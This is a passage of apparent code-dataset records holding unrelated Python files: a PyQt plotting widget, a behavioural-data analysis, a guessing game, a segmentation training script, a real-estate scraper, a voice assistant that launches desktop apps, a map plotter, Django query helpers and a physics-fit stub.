\n # Q3 axes\n if Q3_x == [] and not self.hold_cb.isChecked():\n self.axes_Q3.set_xticklabels([])\n self.axes_Q3.set_yticklabels([])\n else:\n try:\n x_UB_Q3 = int(ceil(log10(max(Q3_x))))\n y_UB_Q3 = int(ceil(log10(max(Q3_y))))\n x_LB_Q3 = int(floor(log10(min(Q3_x))))\n y_LB_Q3 = int(floor(log10(min(Q3_y))))\n except:\n x_UB_Q3 = 2\n y_UB_Q3 = 2\n x_LB_Q3 = -1\n y_LB_Q3 = -1\n Q3_xlabels = []\n Q3_ylabels = []\n for i in range(x_LB_Q3, x_UB_Q3 + 1):\n Q3_xlabels.append('$-10^{%s}$' % str(i))\n for i in range(y_LB_Q3, y_UB_Q3 + 1):\n Q3_ylabels.append('$-10^{%s}$' % str(i))\n self.axes_Q3.set_xticklabels(Q3_xlabels)\n self.axes_Q3.set_yticklabels(Q3_ylabels)\n self.axes_Q3.xaxis.tick_bottom()\n self.axes_Q3.yaxis.tick_left()\n \n # Q4 axes\n if Q4_x == [] and not self.hold_cb.isChecked():\n self.axes_Q4.set_xticklabels([])\n self.axes_Q4.set_yticklabels([])\n else:\n try:\n x_UB_Q4 = int(ceil(log10(max(Q4_x))))\n y_UB_Q4 = int(ceil(log10(max(Q4_y))))\n x_LB_Q4 = int(floor(log10(min(Q4_x))))\n y_LB_Q4 = int(floor(log10(min(Q4_y))))\n except:\n x_UB_Q4 = 2\n y_UB_Q4 = 2\n x_LB_Q4 = -1\n y_LB_Q4 = -1\n Q4_xlabels = []\n Q4_ylabels = []\n for i in range(x_LB_Q4, x_UB_Q4 + 1):\n Q4_xlabels.append('$10^{%s}$' % str(i))\n for i in range(y_LB_Q4, y_UB_Q4 + 1):\n Q4_ylabels.append('$-10^{%s}$' % str(i))\n self.axes_Q4.set_xticklabels(Q4_xlabels)\n self.axes_Q4.set_yticklabels(Q4_ylabels)\n self.axes_Q4.xaxis.tick_bottom()\n self.axes_Q4.yaxis.tick_right()\n \n \n def guardarImagen(self):\n path = os.path.abspath(\"untitled.png\") \n self.canvas.resize(460,261 ) \n self.canvas.print_figure(path, dpi = self.dpi)\n self.statusBar().showMessage('Saved to %s' % path, 2000)\n self.canvas.resize(560,361 ) \n \ndef main():\n # Check if QApplication already 
exists; if not, create it!\n # (IPython compatibility)\n app2 = QApplication.instance()\n if not app2:\n app2 = QApplication(sys.argv)\n cp = CutePlot()\n cp.show()\n \n app2.exec_()\n \nif __name__ == '__main__':\n main()\n\n'''if __name__ == \"__main__\":\n app2 = QApplication(sys.argv)\n window = CutePlot()\n window.show()\n sys.exit(app2.exec_())'''","sub_path":"ProyectoMetodosNumericos/Graficador/CutePlot.py","file_name":"CutePlot.py","file_ext":"py","file_size_in_byte":31344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"542501503","text":"from soup.classic import *\nfrom soup import pretty\nfrom routines import psy_fit, psy, chro, prettyleg, psylab\nimport matplotlib.gridspec as gridspec\nfrom statsmodels.discrete.discrete_model import Logit\nfrom scipy import signal\nimport os,json\n\n### Parameters\ndata_path = '/Users/ben/data/puffs/cohort_1/trunc.h5'\ndata_path_c0 = '/Users/ben/data/puffs/cohort_1/data_c0.h5'\ndata_path_c1_old = ['/Users/ben/data/puffs/cohort_1/data_c1_prepandas_0.h5','/Users/ben/data/puffs/cohort_1/data_c1_prepandas_1.h5']\nfigs = [0]\npp = dict(fmt='o', markeredgewidth=0) #plot params for psy\nlegp = dict(loc='best', fontsize='large', numpoints=1, frameon=False, markerscale=0, markerfirst=False)\ncmap = pl.cm.spectral\n\n### Load data\nwith pd.HDFStore(data_path) as hdf:\n trials = hdf.trials\n\n### Preprocessing\ntrials = trials[~trials.subj.isin([0,16])] # exclude test subjects\nusub = np.sort(trials.subj.unique()).tolist()\ntrials.subj = trials.subj.map(lambda x: usub.index(x)) #rename subjects\n\n### analysis\ntrials = trials[trials.condition.isin([2,1])] #sal, cno\ntrials = trials[trials.outcome<2]\noksesh = np.array([s for s in trials.session.unique() if (trials.session==s).sum()>50])\ntrials = trials[trials.session.isin(oksesh)]\n\ntrials = trials[trials.subj.isin([1,2])]\n\n# heatmap analysis\nchunk = 10\nnchunks = 8\nresults = np.zeros([len(trials.session.unique()), nchunks])\nresults[:] = np.nan\nses_idx = 0\ncond_labels = np.empty(len(results))\n\n# performance as function of last trials analysis\ndatapoints = []\n\n# within-session\nwsesh = []\n\nfor s,c in zip(trials.subj.unique(), pl.cm.viridis(np.linspace(0,1,len(trials.subj.unique())))):\n t = trials[trials.subj==s]\n t.reset_index(drop=True, inplace=True)\n \n # basic binned leanring curves\n pl.figure(1)\n ch = 150\n lc = [t.iloc[i*ch:ch*i+ch].outcome.mean() for i in np.arange(len(t)//ch)]\n pl.plot(lc)\n\n #within-session learning\n for us in t.session.unique():\n ts = t[t.session==us]\n baseline = t.iloc[ts.index[0]-50:].outcome.mean()\n con = ts.condition.mean()\n step = 20\n steps = []\n for i in range(0,180,step):\n steps.append(ts.iloc[i:i+step].outcome.mean()-baseline)\n #wsesh.append((con, ts.iloc[-50:].outcome.mean()-ts.iloc[:50].outcome.mean()))\n wsesh.append((con,steps))\n\n # perf as fxn of last trials\n win = 50\n perf = t.outcome.rolling(win).mean()\n last = t.condition.rolling(win).mean()\n sesh = t.session.diff()\n datapoints.append((last,perf,sesh))\n\n # heatmap\n for us in t.session.unique():\n ts = t[t.session==us]\n i0 = np.where(t.session==us)[0][0]\n cond_labels[ses_idx] = ts.condition.mean()\n for chi,ch in enumerate(np.arange(0, chunk*nchunks, chunk)):\n follow = t.ix[ts.index[-1]:ts.index[-1]+ch+chunk] #cumulative\n results[ses_idx, chi] = follow.outcome.mean() - t.iloc[i0-3*chunk:].outcome.mean()\n ses_idx += 1\n\n#assert sum([np.any(np.isnan(i)) for i in results]) == len(trials.subj.unique()) #each subj has 
a last day\nexclude = np.array([np.any(np.isnan(i)) for i in results])\nresults = results[~exclude]\ncond_labels = cond_labels[~exclude]\nfig,axs = pl.subplots(2,2); axs=axs.ravel()\nimsh1=axs[0].imshow(results[cond_labels==2], interpolation='nearest', vmin=0, vmax=1)\n#pl.colorbar(imsh1)\nimsh2=axs[1].imshow(results[cond_labels==1], interpolation='nearest', vmin=0, vmax=1)\npl.colorbar(imsh2, ax=axs[1])\naxs[0].set_title('Saline')\naxs[1].set_title('CNO')\naxs[0].set_xlabel('Trials')\naxs[1].set_xlabel('Trials')\naxs[0].set_xticks([])\naxs[1].set_xticks([])\naxs[0].set_yticks([])\naxs[1].set_yticks([])\naxs[0].set_ylabel('Sessions')\n#axs[1].set_ylabel('Sessions')\naxs[0].set_aspect(0.4)\naxs[1].set_aspect(0.4)\naxs[2].plot(results[cond_labels==2].mean(axis=0))\naxs[3].plot(results[cond_labels==1].mean(axis=0))\n#axs[2].set_ylim([-.04,.04])\n#axs[3].set_ylim([-.04,.04])\n#axs[3].set_yticks([])\naxs[2].set_ylabel('∆ performance')\n\nfig,axs = pl.subplots(len(datapoints),1,sharex=True, figsize=(15,9)); axs=axs.ravel()\nfor dp,ax in zip(datapoints,axs):\n last,perf,sesh = dp\n #sesh = np.append(0,sesh)\n sesh = sesh>0\n last,perf = map(np.asarray, [last,perf])\n sesh = sesh[~np.isnan(last)]\n last = last[~np.isnan(last)]\n perf = perf[~np.isnan(perf)]\n ax.plot((last-1)/2+0.5, label='condition (low=CNO)')\n ax.plot(perf, label='rolling performance')\n ax.plot(sesh/2+0.5, linestyle='--', label='session breaks')\n ax.legend(loc='best', fontsize=10)\n #pl.xlabel('avg condition over previous n trials')\n #pl.ylabel('change in performance from previous n trials to future n trials')\n\n#pl.figure(4)\nones = [i[1] for i in wsesh if i[0]==1]\ntwos = [i[1] for i in wsesh if i[0]==2]\n#pl.boxplot([twos,ones])\n#pl.xticks([1,2],['saline','cno'])\n","sub_path":"analysis/c1/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":4793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"93447595","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n__author__ = 'ByStudent'\nnumber = 59\nguess = int(input(\"Please enter an integer: \"))\nif guess == number:\n print ('Bingo! you guessed it right.')\nelif guess > number:\n print ('No! the number is higher than that.')\nelse:\n print ('No! 
the number is lower than that.')\nprint ('Done')","sub_path":"TestIf.py","file_name":"TestIf.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"549042796","text":"import sys\nimport os\nfrom optparse import OptionParser\n\nimport numpy as np\nimport torch\nimport torchvision\nimport torch.backends.cudnn as cudnn\nimport torch.nn as nn\nfrom torch import optim\nfrom tqdm import tqdm\n\nfrom eval import eval_net,test_net\nfrom unet import UNet,UNet1,ResNetUNet,FCN8s,VGGNet\nfrom utils import *\nimport vnet\nfrom torchvision.models import vgg16\nimport segmentation_models_pytorch as smp\n\ndef get_args():\n parser = OptionParser()\n parser.add_option('-e', '--epochs', dest='epochs', default=200, type='int',\n help='number of epochs')\n parser.add_option('-b', '--batchsize', dest='batchsize', default=8,\n type='int', help='batch size')\n parser.add_option('-l', '--learning-rate', dest='lr', default=0.001,\n type='float', help='learning rate')\n parser.add_option('-g', '--gpu', action='store_true', dest='gpu',\n default=True, help='use cuda')\n parser.add_option('--test',action='store_true',dest='test',default = False,help='use test mode')\n parser.add_option('-c', '--load', type=str,\n default='', help='load file model')\n parser.add_option('--gpu_id',default = '1',type = 'str',help = 'choose the target gpu')\n parser.add_option('--start_epoch',default = 0,type = int,help = 'use to continue the training scheme')\n parser.add_option('--optimizer',default= 'SGD',type = str,help='control the mode of optimizer')\n parser.add_option('--sparse_iteration',default =3,type= int)\n parser.add_option('--sparse_ratio',default=0.4,type=float)\n parser.add_option('--arch',default='',type=str)\n parser.add_option('--test_cp',default='',type=str)\n\n (options, args) = parser.parse_args()\n return options\n\nargs = get_args()\nresult_path_global = '/mnt/HDD1/Frederic/Segmentation/fcn_baseline/'+args.arch+'_result/'\nmake_path(result_path_global)\ndef train_net(net,\n epochs=5,\n batch_size=2,\n lr=0.0001,\n save_cp=True,\n gpu=True,\n target_path = '',\n checkpoint_path='/mnt/HDD1/Frederic/Segmentation/fcn_baseline/'\n ):\n\n#Set path to store checkpoint\n dir_checkpoint = checkpoint_path+args.arch+'checkpoints/'\n result_path = result_path_global\n make_path(dir_checkpoint)\n#Print training details\n print('''\n Starting training, details:\n Epochs: {}\n Batch size: {}\n Learning rate: {}\n Checkpoints: {}\n CUDA: {}\n '''.format(epochs, batch_size, lr, str(save_cp), str(gpu)))\n\n#loss function and optimizer\n optimizer = optim.SGD(net.parameters(),lr=lr,momentum=0.9)\n\n criterion = nn.CrossEntropyLoss()\n # criterion = nn.BCELoss()\n\n#Train iteration\n logger = Logger(result_path+'log.txt',title = 'ISIC2016_U_Net')\n logger.set_names(['Epochs','Avg_Training_Loss','Val_Dice_coefficient'])\n#load data\n val_sets = load_validation_data()\n start_epoch = args.start_epoch\n best_dice,best_epoch=0,0\n for epoch in range(start_epoch,start_epoch + epochs):\n net.train()\n #use epoch_loss to store total loss for whole iteration\n trainloader,datasize = load_train_data(args.batchsize)\n epoch_loss = 0\n if epoch ==75 or epoch==150 or epoch ==225:\n lr = lr*0.1\n optimizer = optim.SGD(net.parameters(),lr=lr,momentum=0.9)\n with tqdm(total = datasize/batch_size) as pbar:\n for ite,data in 
enumerate(trainloader[0]):\n imgs = data[0]\n true_masks = data[1]\n \n if gpu:\n imgs = imgs.cuda()\n true_masks = true_masks.cuda()\n\n masks_pred = net(imgs)\n true_masks = true_masks.squeeze(dim=1) \n # loss = DiceLoss(masks_pred,true_masks)\n loss = criterion(masks_pred,true_masks.long())\n epoch_loss += loss.item()\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n #set bar for training\n pbar.set_description('Epoch:[%d|%d],loss: %.4f ' % (epoch + 1,args.epochs+start_epoch,loss))\n pbar.update(1)\n \n avg_loss = epoch_loss / (ite + 1)\n print('Epoch finished ! Loss: {}'.format(avg_loss))\n\n # save the sample output every 50 epochs\n save_sample_mask = False\n if (epoch+1)%50 ==0:\n save_sample_mask = True \n val_dice = eval_net(net, val_sets,epoch,gpu,save_sample_mask,result_path)\n print('Validation Dice Coeff: {}'.format(val_dice))\n logger.append([epoch+1,avg_loss,val_dice])\n\n #save best epoch and checkpoint\n if best_dice < val_dice:\n best_dice = val_dice\n best_epoch = epoch \n torch.save(net.state_dict(),\n dir_checkpoint+ 'best_checkpoint.pth')\n \n print('best checkpoint is epoch {} with dice {} '.format(best_epoch,best_dice))\n #save normal epoch\n if save_cp and (epoch+1)%50==0: \n torch.save(net.state_dict(),\n dir_checkpoint + 'CP{}.pth'.format(epoch + 1))\n # print('Checkpoint {} saved !'.format(epoch + 1))\n\n #plot fig after train\n logger.close()\n logger.plot()\n # savefig(os.path.join(result_path, 'log.eps'))\n return dir_checkpoint\n\ndef DiceLoss(input, target):\n #self.save_for_backward(input, target)\n eps = 0.0001\n t = 0\n input = input[:,1,:,:]\n inter = torch.dot(input.contiguous().view(-1),target.contiguous().view(-1))\n union = torch.sum(input) + torch.sum(target) + eps\n\n t = (1-(2 * inter.float() + eps) / union.float())\n return t\n\ndef dice_loss(pred, target, smooth = 1.):\n pred = pred.contiguous()\n target = target.contiguous() \n\n intersection = (pred * target).sum(dim=2).sum(dim=2)\n \n loss = (1 - ((2. 
* intersection + smooth) / (pred.sum(dim=2).sum(dim=2) + target.sum(dim=2).sum(dim=2) + smooth)))\n \n return loss.mean()\n\ndef get_model_structure(model,input_size,path):\n arch = summary(model,input_size)\n with open(path,'w') as f:\n f.write(str(arch))\n#main function of train process\n\n\ndef load_model(arch):\n if arch =='fcn8s':\n VGG_model = VGGNet(requires_grad = True,remove_fc = True)\n net = FCN8s(pretrained_net = VGG_model,n_class = 2)\n elif arch== 'unet_resnet34':\n net = smp.Unet('resnet34',encoder_weights=None, classes=2)\n elif arch =='deeplab':\n net = smp.DeepLabV3('resnet50',encoder_weights='imagenet',classes=2)\n elif arch== 'unet_resnet50_pre':\n net = smp.Unet('resnet50',encoder_weights='imagenet', classes=2)\n elif arch== 'unet_resnet101_pre':\n net = smp.Unet('resnet101',encoder_weights='imagenet', classes=2)\n elif arch== 'unet_resnet50':\n net = smp.Unet('resnet50',encoder_weights=None, classes=2)\n elif arch== 'unet_resnet101':\n net = smp.Unet('resnet101',encoder_weights=None, classes=2)\n elif arch== 'unet_vgg_pre':\n net = smp.Unet('vgg16_bn',encoder_weights='imagenet', classes=2)\n elif arch== 'unet_vgg':\n net = smp.Unet('vgg16_bn',encoder_weights=None, classes=2)\n return net\n\nif __name__ == '__main__':\n\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu_id\n # net = UNet(n_channels = 3,n_classes=2)\n # get_model_structure(net,(3,224,224))\n # net = vnet.VNet(elu=False, nll=nll)\n net = load_model(args.arch)\n\n#Use checkpoint\n if args.load:\n net.load_state_dict(torch.load(args.load))\n print('Model loaded from {}'.format(args.load))\n\n if args.gpu:\n net.cuda()\n cudnn.benchmark = True \n\n if args.test:\n testloader = load_test_data()\n best_checkpoint = args.test_cp\n test_net(net = net,\n dataset = testloader,\n checkpoint = best_checkpoint,\n gpu = args.gpu,\n result_path = result_path_global)\n \n if not args.test:\n try:\n dir_cp = train_net(net=net,\n epochs=args.epochs,\n batch_size=args.batchsize,\n lr=args.lr,\n gpu=args.gpu,\n )\n\n testloader = load_test_data()\n best_checkpoint = dir_cp+'best_checkpoint.pth'\n test_net(net = net,\n dataset = testloader,\n checkpoint = best_checkpoint,\n gpu = args.gpu,\n result_path = result_path_global)\n except KeyboardInterrupt:\n torch.save(net.state_dict(), 'INTERRUPTED.pth')\n print('Saved interrupt')\n try:\n sys.exit(0)\n except SystemExit:\n os._exit(0)","sub_path":"Medical_Image_Segmentation/train_FCN_Unet.py","file_name":"train_FCN_Unet.py","file_ext":"py","file_size_in_byte":8926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"102353765","text":"# Used to parse HTML\nfrom bs4 import BeautifulSoup\n\n# Standard lib for regex\nimport re\n\n# Lib to execute https requests and run the javascript (without opening a window)\nimport sys\nfrom PyQt5.QtWidgets import QApplication\nfrom PyQt5.QtCore import QUrl\nfrom PyQt5.QtWebEngineWidgets import QWebEnginePage\n\nfrom datetime import datetime, date, timedelta, time\n\n\nclass Page(QWebEnginePage):\n def __init__(self, url):\n self.app = QApplication(sys.argv)\n QWebEnginePage.__init__(self)\n self.html = ''\n self.loadFinished.connect(self._on_load_finished)\n self.load(QUrl(url))\n self.app.exec_()\n\n def _on_load_finished(self):\n self.html = self.toHtml(self.Callable)\n\n def Callable(self, html_str):\n self.html = html_str\n self.app.quit()\n\n\ndef get_info(annonce, today_datetime, today_date, size):\n \"\"\"This function extracts all the information for one ad of type ''\n \"\"\"\n\n id_ = 
annonce.get('data-id')\n prix = annonce.find('div', class_='%s-price rangePrice' % size)\n\n if prix:\n prix = prix.text\n # Create a list with all the different price\n prix = [int(re.sub('[.]', '', item)) for item in re.findall(r'[0-9.]*', prix) if item != '']\n\n # est_nouveau will be True if there is only one price\n est_nouveau = True if len(prix) == 1 else False\n else:\n prix = []\n est_nouveau = True\n\n sur_ch = annonce.find('div', class_='%s-surface-ch' % size).text\n sur, ch = None, None\n\n # split by 'm', if there isn't 'm' in sur_ch -> tmp = [sur_ch]\n tmp = sur_ch.split('m')\n\n if len(tmp) == 2:\n # get the surface\n sur = [int(re.sub('[.]', '', item)) for item in re.findall(r'[0-9.]*', tmp[0]) if item != ''][0]\n\n # select the string where the information about the rooms is present\n tmp = tmp[1] if len(tmp) == 2 else tmp[0]\n tmp = tmp.split('c')\n if len(tmp) == 2:\n # get the number of rooms\n ch = [int(re.sub('[.]', '', item)) for item in re.findall(r'[0-9.]*', tmp[0]) if item != ''][0]\n\n # strip() removes all invisible characters at the beginning and end of a string\n typ = annonce.find('div', class_='title-bar-left').text.strip()\n commune = annonce.find('div', class_='title-bar-right').text.strip()\n\n # find the zip code\n code_postal = int(re.match(r'[0-9]{4}', commune)[0])\n\n # remove the zip code\n nom_commune = re.sub(r'^%i ' % code_postal, '', commune)\n\n heures, minutes = list(map(int, annonce.find('div', class_='prix-heure').text.split('h')))\n\n if heures > today_datetime.hour:\n heure = datetime.combine(today_date - timedelta(1), time(hour=heures, minute=minutes))\n else:\n heure = datetime.combine(today_date, time(hour=heures, minute=minutes))\n\n lien = annonce.a.get('href')\n\n return {'id': id_,\n 'prix': prix,\n 'surface': sur,\n 'chambres': ch,\n 'est_nouveau': est_nouveau,\n 'code_postal': code_postal,\n 'nom_commune': nom_commune,\n 'date': heure,\n 'lien': lien,\n 'type': typ}\n\n\ndef get_lastest_ads(number_pages=1):\n sizes = ['m', 'l', 'xl']\n today_date = date.today()\n today_datetime = datetime.now()\n\n annonces_json_dict = dict()\n annonces_json_list = list()\n\n for i in range(1, number_pages + 1):\n # Get the HTML for the last real estate ad\n url = 'https://www.immoweb.be/fr/recherche/dernieres-annonces-immobilieres-publiees/a-vendre?page=%i' % i\n client_response = Page(url)\n html_source = client_response.html\n\n # create the BeautifulSoup object from the html\n soup = BeautifulSoup(html_source, 'html.parser')\n\n # Get only the part with the real estate ad\n annonces = soup.find('div', {\"id\": \"result\"})\n\n # Iterate over the different ads of type 'result-%s'\n for size in sizes:\n for i, annonce in enumerate(annonces.findAll('div', class_='result-%s' % size)):\n infos = get_info(annonce, today_datetime, today_date, size)\n annonces_json_dict[infos['id']] = infos\n annonces_json_list.append(infos)\n\n return annonces_json_list, annonces_json_dict\n","sub_path":"modules/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":4208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"577014189","text":"import os\r\nimport pyttsx3\r\nimport datetime\r\n\r\ntoday = datetime.date.today()\r\n\r\npyttsx3.speak(\"Hello user, please provide your name\")\r\na = input(\"Enter your name : \")\r\nprint()\r\nprint(\"Hello \"+ a)\r\npyttsx3.speak(\"Hello\"+a)\r\npyttsx3.speak(\"I am Jarvis\")\r\npyttsx3.speak(\"I am an AI Assistant and can perform a few tasks for you !\")\r\nprint(\"I am Jarvis 
and I am an AI Assitant and can perform a few tasks for you !\")\r\npyttsx3.speak(\"Today's Date is :\")\r\npyttsx3.speak(today)\r\nprint(\"Today's Date is :\")\r\nprint(today)\r\n\r\n\r\npyttsx3.speak(\"I will help you to, open Chrome, Windows Media Player, Calculator, Notepad, Control Panel, Settings. If you want, I can also open Lightroom , Spotify or Zoom App for you\")\r\npyttsx3.speak(\"So, tell me\"+a+\"what can I do for you ? \")\r\n\r\n\r\nwhile True:\r\n p=input(\"Kindly give me a task to perform : \")\r\n p=p.lower()\r\n \r\n \r\n if((\"do not\" not in p) and (\"dont\" not in p) and (\"don't\" not in p)) and (((\"run\" in p) or (\"execute\" in p) or (\"open\" in p))\r\nand ((\"chrome\" in p) or (\"browser\" in p) or (\"search engine\" in p) or (\"google\" in p))):\r\n pyttsx3.speak(\"Opening Google Chrome\")\r\n os.system(\"chrome\")\r\n\r\n \r\n\r\n elif((\"do not\" not in p) and (\"dont\" not in p) and (\"don't\" not in p)) and (((\"run\" in p) or (\"execute\" in p) or (\"open\" in\r\np)) and ((\"player\" in p) or (\"media player\" in p) or (\"audio player\" in p) or (\"video player\" in p))):\r\n pyttsx3.speak(\"Opening Windows Media Player\")\r\n os.system(\"wmplayer\")\r\n\r\n\r\n\r\n elif((\"do not\" not in p) and (\"dont\" not in p) and (\"don't\" not in p)) and (((\"run\" in p) or (\"execute\" in p) or (\"open\" in\r\np)) and ((\"editor\" in p) or (\"notepad\" in p) or (\"text editor\" in p) or (\"writer\" in p))):\r\n pyttsx3.speak(\"Opening Notepad\")\r\n os.system(\"notepad\")\r\n\r\n\r\n elif((\"do not\" not in p) and (\"dont\" not in p) and (\"don't\" not in p)) and (((\"open\" in p) or (\"run\" in p) or (\"execute\" in\r\np)) and ((\"control panel\" in p) or (\"hardware settings\" in p) or (\"software settings\" in p) or (\"user control settings\" in p)\r\nor (\"controlpanel\" in p))):\r\n pyttsx3.speak(\"Opening Control Panel\")\r\n os.system(\"control panel\")\r\n\r\n\r\n elif((\"do not\" not in p) and (\"dont\" not in p) and (\"don't\" not in p)) and (((\"open\" in p) or (\"run\" in p) or (\"want\" in\r\np)) and ((\"lightroom\" in p) or (\"edit\" in p) or (\"picture\" in p))):\r\n pyttsx3.speak(\"Opening Adobe Lightroom\")\r\n os.system(\"lightroom\")\r\n\r\n\r\n elif((\"do not\" not in p) and (\"dont\" not in p) and (\"don't\" not in p)) and (((\"open\" in p) or (\"run\" in p) or (\"execute\" in\r\np)) and ((\"computer settings\" in p) or (\"settings\" in p) or (\"pc settings\" in p))):\r\n pyttsx3.speak(\"Opening System Settings\")\r\n os.system(\"start ms-settings:\")\r\n\r\n\r\n\r\n elif((\"do not\" not in p) and (\"dont\" not in p) and (\"don't\" not in p)) and (((\"open\" in p) or (\"play\" in p) or (\"want\" in\r\np)) and ((\"spotify\" in p) or (\"music\" in p) or (\"song\" in p))):\r\n pyttsx3.speak(\"Opening Spotify\")\r\n os.system(\"spotify\")\r\n\r\n\r\n\r\n elif((\"do not\" not in p) and (\"dont\" not in p) and (\"don't\" not in p)) and (((\"open\" in p) or (\"play\" in p) or (\"want\" in\r\np)) and ((\"calculator\" in p) or (\"add\" in p) or (\"subtract\" in p) or (\"multiply\" in p) or (\"divide\" in p) or (\"numbers\" in p))):\r\n pyttsx3.speak(\"Opening Calculator\")\r\n os.system(\"calc\")\r\n\r\n\r\n\r\n elif((\"do not\" not in p) and (\"dont\" not in p) and (\"don't\" not in p)) and (((\"run\" in p) or (\"execute\" in p) or (\"open\" in p))\r\nand ((\"video call\" in p) or (\"zoom app\" in p) or (\"zoom\" in p) or (\"video conference\" in p))):\r\n pyttsx3.speak(\"Opening Zoom App\")\r\n os.system(\"zoom\")\r\n \r\n\r\n\r\n elif(\"exit\" in 
p) or (\"close\" in p) or (\"quit\" in p):\r\n pyttsx3.speak(\"Thank you Sir, goodbye, have a nice day ahead\")\r\n print(\"Thank you Sir, goodbye, have a nice day ahead.\")\r\n break\r\n\r\n\r\n else:\r\n pyttsx3.speak(\"I don't know how to do this\")\r\n print(\"Try again !\")","sub_path":"Jarvis.py","file_name":"Jarvis.py","file_ext":"py","file_size_in_byte":3864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"539464343","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu May 21 12:41:08 2015\r\n\r\n@author: admin\r\n\"\"\"\r\n\r\nimport csv\r\nfrom mpl_toolkits.basemap import Basemap\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport os\r\nfrom random import randint\r\nfrom os import makedirs\r\nfrom os.path import exists\r\n\r\n\r\n \r\n# Open the earthquake data file.\r\nfilename = 'C:/Users/admin/Dropbox/Gotham/Parking/RulesGeoloc/'\r\npathDest = 'C:/Users/admin/Documents/PlanetWorld/MapClustersRulesParking/'\r\n\r\nif not exists(pathDest):\r\n makedirs(pathDest)\r\n\r\n# Create empty lists for the data we are interested in.\r\nlats, lons = [], []\r\nrayons = []\r\ncolorList = np.asarray(['go','ro','bo'])\r\ncompte = 0\r\n\r\n\r\n\r\nListFiles = os.listdir(filename)\r\nListAllClusters = []\r\nfor fileCluster in ListFiles:\r\n idCluster = fileCluster.find('_Rule')\r\n ListAllClusters.append(fileCluster[0:idCluster])\r\n\r\nListClusters = np.unique(ListAllClusters)\r\n\r\nListFiles = np.asarray(ListFiles)\r\nfor Cluster in ListClusters:\r\n IdCluster = np.nonzero(np.in1d(ListAllClusters,Cluster))[0]\r\n ListFilesCluster = ListFiles[IdCluster]\r\n \r\n latC, longC = Cluster.split('_')\r\n latC = float(latC)\r\n longC = float(longC)\r\n \r\n numRule = 0\r\n for filerule in ListFilesCluster:\r\n\r\n plt.figure(figsize=(16,12))\r\n \r\n eq_map = Basemap(projection='merc', resolution = 'h', area_thresh = 1.0,\r\n llcrnrlon= longC - 30, llcrnrlat= latC - 25,\r\n urcrnrlon= longC + 30, urcrnrlat= latC + 25)\r\n eq_map.drawcoastlines()\r\n eq_map.drawcountries()\r\n eq_map.fillcontinents(color = 'gray')\r\n eq_map.drawmapboundary()\r\n eq_map.drawmeridians(np.arange(0, 360, 30),labels=[0,0,0,1])\r\n eq_map.drawparallels(np.arange(-90, 90, 30),labels=[1,0,0,0])\r\n \r\n cl = colorList[randint(0,2)]\r\n \r\n x,y = eq_map(longC, latC)\r\n eq_map.plot(x, y, 'yo', markersize = 20)\r\n \r\n f = filename + filerule\r\n with open(f) as lf:\r\n # Create a csv reader object.\r\n reader = csv.reader(lf)\r\n # Ignore the header row.\r\n # Store the latitudes and longitudes in the appropriate lists.\r\n numrow = 0\r\n for row in reader:\r\n if numrow != 0:\r\n lats.append(float(row[0]))\r\n lons.append(float(row[1]))\r\n #rayons.append(float(row[0]))\r\n # Min & Max des longitudes et latitudes:\r\n longiMax = np.max(lons)\r\n longiMin = np.min(lons)\r\n latiMax = np.max(lats)\r\n latiMin = np.min(lats)\r\n numrow += 1\r\n compte += 1\r\n\r\n for lon, lat in zip (lons, lats):\r\n x,y = eq_map(lon, lat)\r\n eq_map.plot(x, y, cl, markersize= 10)\r\n \r\n \r\n title_string = \"Hadrian Marine : Rule \" + str(numRule) + \" of Cluster \" + Cluster\r\n plt.title(title_string)\r\n \r\n plt.savefig(pathDest + Cluster + '_Rule_' + str(numRule) + '.png')\r\n \r\n numRule += 1\r\n","sub_path":"Marine/MarineBasemap.py","file_name":"MarineBasemap.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"250871797","text":"from django.db import 
models\nfrom django.db.models import Sum, F\nfrom django.db.models.functions import Coalesce\n\nfrom KlimaKar.functions import normal_round\n\n\nclass SingletonModel(models.Model):\n class Meta:\n abstract = True\n\n def save(self, *args, **kwargs):\n self.pk = 1\n super().save(*args, **kwargs)\n\n def delete(self, *args, **kwargs):\n pass\n\n @classmethod\n def load(cls):\n obj, created = cls.objects.get_or_create(pk=1)\n return obj\n\n\nclass TotalValueQuerySet(models.QuerySet):\n def total(self, price_type=None):\n price_field = self.model.PRICE_FIELD\n if price_type:\n price_field = \"{}_{}\".format(price_field, price_type)\n value = self.aggregate(\n total=Coalesce(\n Sum(\n F(price_field) * F(self.model.QUANTITY_FIELD),\n output_field=models.DecimalField(),\n ),\n 0,\n output_field=models.DecimalField(),\n )\n )[\"total\"]\n return normal_round(value, 2)\n\n def order_by_total(self, is_descending=True, price_type=None):\n price_field = self.model.PRICE_FIELD\n if price_type:\n price_field = \"{}_{}\".format(price_field, price_type)\n return self.annotate(\n total=Coalesce(\n Sum(\n F(price_field) * F(self.model.QUANTITY_FIELD),\n output_field=models.DecimalField(),\n ),\n 0,\n output_field=models.DecimalField(),\n )\n ).order_by(\"{}total\".format(\"-\" if is_descending else \"\"))\n","sub_path":"KlimaKar/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"562034244","text":"import zfit\nimport zfit_physics as zphysics\n\n# signal models -----------------------------------------\nZMASS = zfit.Parameter('mass', 91.1876, floating=False)\nZWIDTH = zfit.Parameter('width', 2.4952, floating=False)\n\n# resolution functions -----------------------------------------\n\ndef 